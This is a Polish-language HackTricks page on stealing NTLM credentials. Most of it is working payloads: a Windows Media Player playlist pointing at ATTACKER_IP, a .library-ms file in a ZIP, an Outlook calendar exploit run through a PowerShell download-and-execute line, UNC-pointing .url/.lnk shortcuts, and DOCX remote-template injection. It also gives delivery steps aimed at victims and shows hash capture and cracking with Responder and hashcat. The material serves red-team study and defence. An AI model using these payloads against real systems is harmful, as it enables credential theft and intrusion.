Miejsca do kradzieży NTLM creds
Reading time: 7 minutes
tip
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.
Sprawdź wszystkie świetne pomysły z https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — od pobrania pliku Microsoft Word online po źródło ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md oraz https://github.com/p0dalirius/windows-coerced-authentication-methods
Windows Media Player listy odtwarzania (.ASX/.WAX)
Jeśli możesz sprawić, by target otworzył lub podejrzał playlistę Windows Media Player, którą kontrolujesz, możesz spowodować leak Net‑NTLMv2, wskazując wpis na ścieżkę UNC. WMP spróbuje pobrać odwołane media przez SMB i uwierzytelni się automatycznie.
Przykładowy payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Proces zbierania i łamania:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP-osadzony .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer nieprawidłowo obsługuje pliki .library-ms, gdy są otwierane bezpośrednio z archiwum ZIP. Jeśli definicja biblioteki wskazuje na zdalną ścieżkę UNC (np. \attacker\share), samo przeglądanie/uruchomienie .library-ms wewnątrz ZIP powoduje, że Explorer enumeruje UNC i wysyła uwierzytelnianie NTLM do atakującego. To daje NetNTLMv2, które można złamać offline lub potencjalnie relayed.
Minimalny .library-ms wskazujący na UNC atakującego
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Kroki operacyjne
- Utwórz plik .library-ms z powyższym XML (ustaw swój IP/hostname).
- Spakuj go (on Windows: Send to → Compressed (zipped) folder) i dostarcz plik ZIP do celu.
- Uruchom NTLM capture listener i poczekaj, aż ofiara otworzy .library-ms z wnętrza ZIP.
Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak
Microsoft Outlook for Windows obsługiwał rozszerzoną właściwość MAPI PidLidReminderFileParameter w elementach kalendarza. Jeśli ta właściwość wskazywała na UNC path (np. \attacker\share\alert.wav), Outlook łączyłby się z udostępnieniem SMB, gdy przypomnienie się uruchomi, leaking the user’s Net‑NTLMv2 bez żadnego kliknięcia. Zostało to załatane 14 marca 2023, ale nadal jest wysoce istotne dla starszych/niezaktualizowanych środowisk oraz dla historycznej analizy incydentów.
Szybkie wykorzystanie za pomocą PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Po stronie listenera:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Notatki
- Ofiara musi mieć uruchomiony Outlook for Windows w momencie wyzwolenia przypomnienia.
- The leak yields Net‑NTLMv2 suitable for offline cracking or relay (not pass‑the‑hash).
.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)
Windows Explorer automatycznie wyświetla ikony skrótów. Najnowsze badania wykazały, że nawet po łacie Microsoft z kwietnia 2025 dla skrótów z ikonami UNC nadal było możliwe wywołanie uwierzytelniania NTLM bez kliknięć poprzez umieszczenie celu skrótu na ścieżce UNC i utrzymanie ikony lokalnej (omijanie łaty otrzymało CVE‑2025‑50154). Samo przeglądanie folderu powoduje, że Explorer pobiera metadane z zdalnego celu, wysyłając NTLM do serwera SMB atakującego.
Minimalny payload Internet Shortcut (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Skrót programu z payload (.lnk) za pomocą PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Sposoby dostarczenia
- Umieść skrót w archiwum ZIP i nakłoń ofiarę do jego przeglądania.
- Umieść skrót w zapisywalnym udziale sieciowym, który ofiara otworzy.
- Połącz z innymi plikami-wabikami w tym samym folderze, aby Explorer wyświetlał ich podgląd.
Office remote template injection (.docx/.dotm) to coerce NTLM
Dokumenty Office mogą odwoływać się do zewnętrznego szablonu. Jeśli ustawisz dołączony szablon na ścieżkę UNC, otwarcie dokumentu spowoduje uwierzytelnienie do SMB.
Minimalne zmiany relacji DOCX (wewnątrz word/):
- Edytuj word/settings.xml i dodaj odniesienie do dołączonego szablonu:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Edytuj word/_rels/settings.xml.rels i ustaw rId1337 na swój UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Spakuj ponownie do .docx i dostarcz. Uruchom nasłuchiwacz przechwytywania SMB i poczekaj na otwarcie.
Po przechwyceniu, jeśli szukasz pomysłów na relaying lub wykorzystywanie NTLM, sprawdź:
Źródła
- HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
- HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
- Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)
tip
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.